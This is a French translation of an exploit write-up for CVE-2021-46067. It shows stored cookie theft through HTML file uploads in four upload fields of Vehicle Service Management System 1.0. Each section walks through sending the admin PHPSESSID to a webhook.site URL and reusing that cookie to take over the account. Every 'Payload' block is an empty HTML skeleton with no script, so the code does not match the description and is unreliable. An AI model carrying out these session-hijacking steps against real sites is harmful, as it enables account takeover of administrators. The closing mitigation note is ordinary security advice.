CVE-2021-46067
Titre de l'exploit : Vehicle Service Management System - 'Multiple' Vol de cookies conduisant à une prise de contrôle complète du compte
Auteur de l'exploit : SANU P.L
CVE : CVE-2021-46067
CVSS : 9.8 CRITIQUE
Références :
Description :
Dans Vehicle Service Management System 1.0, un attaquant peut voler les cookies, ce qui conduit à une prise de contrôle complète du compte.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Mon Compte http://localhost/vehicle_service/admin/?page=user
- Générez l'URL Webhook - https://webhook.site
- Copiez l'URL unique du Webhook et collez-la dans le code HTML ci-dessous.
Payload :
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Cookie Stealing.html
- Dans la section Mon Compte, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
- Cliquez sur le bouton Mettre à jour.
- Ouvrez l'image de l'avatar dans un nouvel onglet et vérifiez le statut du Webhook.
- Nous obtenons la requête contenant PHPSESSID.
- Copiez la valeur PHPSESSID et ouvrez un autre navigateur.
- Visitez le panneau d'administration http://localhost/vehicle_service/admin
- Vérifiez les valeurs des cookies et remplacez la valeur PHPSESSID par la valeur PHPSESSID copiée.
- Accédez maintenant au panneau d'administration http://localhost/vehicle_service/admin
- Connexion réussie au compte. Prise de contrôle du compte réussie.
2. Vehicle Service Management System - 'Liste des utilisateurs' (/admin/?page=user/manage_user)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Liste des utilisateurs et cliquez sur le bouton Créer un nouveau.
- Générez l'URL Webhook - https://webhook.site
- Copiez l'URL unique du Webhook et collez-la dans le code HTML ci-dessous.
Payload :
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Cookie Stealing.html
- Dans la section Créer un nouvel utilisateur, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
- Cliquez sur le bouton Enregistrer.
- Ouvrez l'image de l'avatar dans un nouvel onglet et vérifiez le statut du Webhook.
- Nous obtenons la requête contenant PHPSESSID.
- Copiez la valeur PHPSESSID et ouvrez un autre navigateur.
- Visitez le panneau d'administration http://localhost/vehicle_service/admin
- Vérifiez les valeurs des cookies et remplacez la valeur PHPSESSID par la valeur PHPSESSID copiée.
- Accédez maintenant au panneau d'administration http://localhost/vehicle_service/admin
- Connexion réussie au compte. Prise de contrôle du compte réussie.
3. Vehicle Service Management System - 'Paramètres - Logo du système' (/admin/?page=system_info)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info
- Générez l'URL Webhook - https://webhook.site
- Copiez l'URL unique du Webhook et collez-la dans le code HTML ci-dessous.
Payload :
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Cookie Stealing.html
- Dans la section Paramètres, saisissez tous les détails requis et parcourez le fichier HTML dans Logo du système.
- Cliquez sur le bouton Mettre à jour.
- Ouvrez l'image du logo du système dans un nouvel onglet et vérifiez le statut du Webhook.
- Nous obtenons la requête contenant PHPSESSID.
- Copiez la valeur PHPSESSID et ouvrez un autre navigateur.
- Visitez le panneau d'administration http://localhost/vehicle_service/admin
- Vérifiez les valeurs des cookies et remplacez la valeur PHPSESSID par la valeur PHPSESSID copiée.
- Accédez maintenant au panneau d'administration http://localhost/vehicle_service/admin
- Connexion réussie au compte. Prise de contrôle du compte réussie.
4. Vehicle Service Management System - 'Paramètres - Couverture du site Web' (/admin/?page=system_info)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info
- Générez l'URL Webhook - https://webhook.site
- Copiez l'URL unique du Webhook et collez-la dans le code HTML ci-dessous.
Payload :
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Cookie Stealing.html
- Dans la section Paramètres, saisissez tous les détails requis et parcourez le fichier HTML dans Couverture du site Web.
- Cliquez sur le bouton Mettre à jour.
- Ouvrez l'image de couverture du site Web dans un nouvel onglet et vérifiez le statut du Webhook.
- Nous obtenons la requête contenant PHPSESSID.
- Copiez la valeur PHPSESSID et ouvrez un autre navigateur.
- Visitez le panneau d'administration http://localhost/vehicle_service/admin
- Vérifiez les valeurs des cookies et remplacez la valeur PHPSESSID par la valeur PHPSESSID copiée.
- Accédez maintenant au panneau d'administration http://localhost/vehicle_service/admin
- Connexion réussie au compte. Prise de contrôle du compte réussie.
Impact :
Un attaquant télécharge un fichier HTML malveillant qui redirige vers un site tiers et les cookies sont exposés dans la requête. Cela conduit à une prise de contrôle complète du compte.
Atténuation :
Il est recommandé de valider la fonctionnalité de téléchargement de fichiers et d'effectuer des vérifications secondaires dans la session.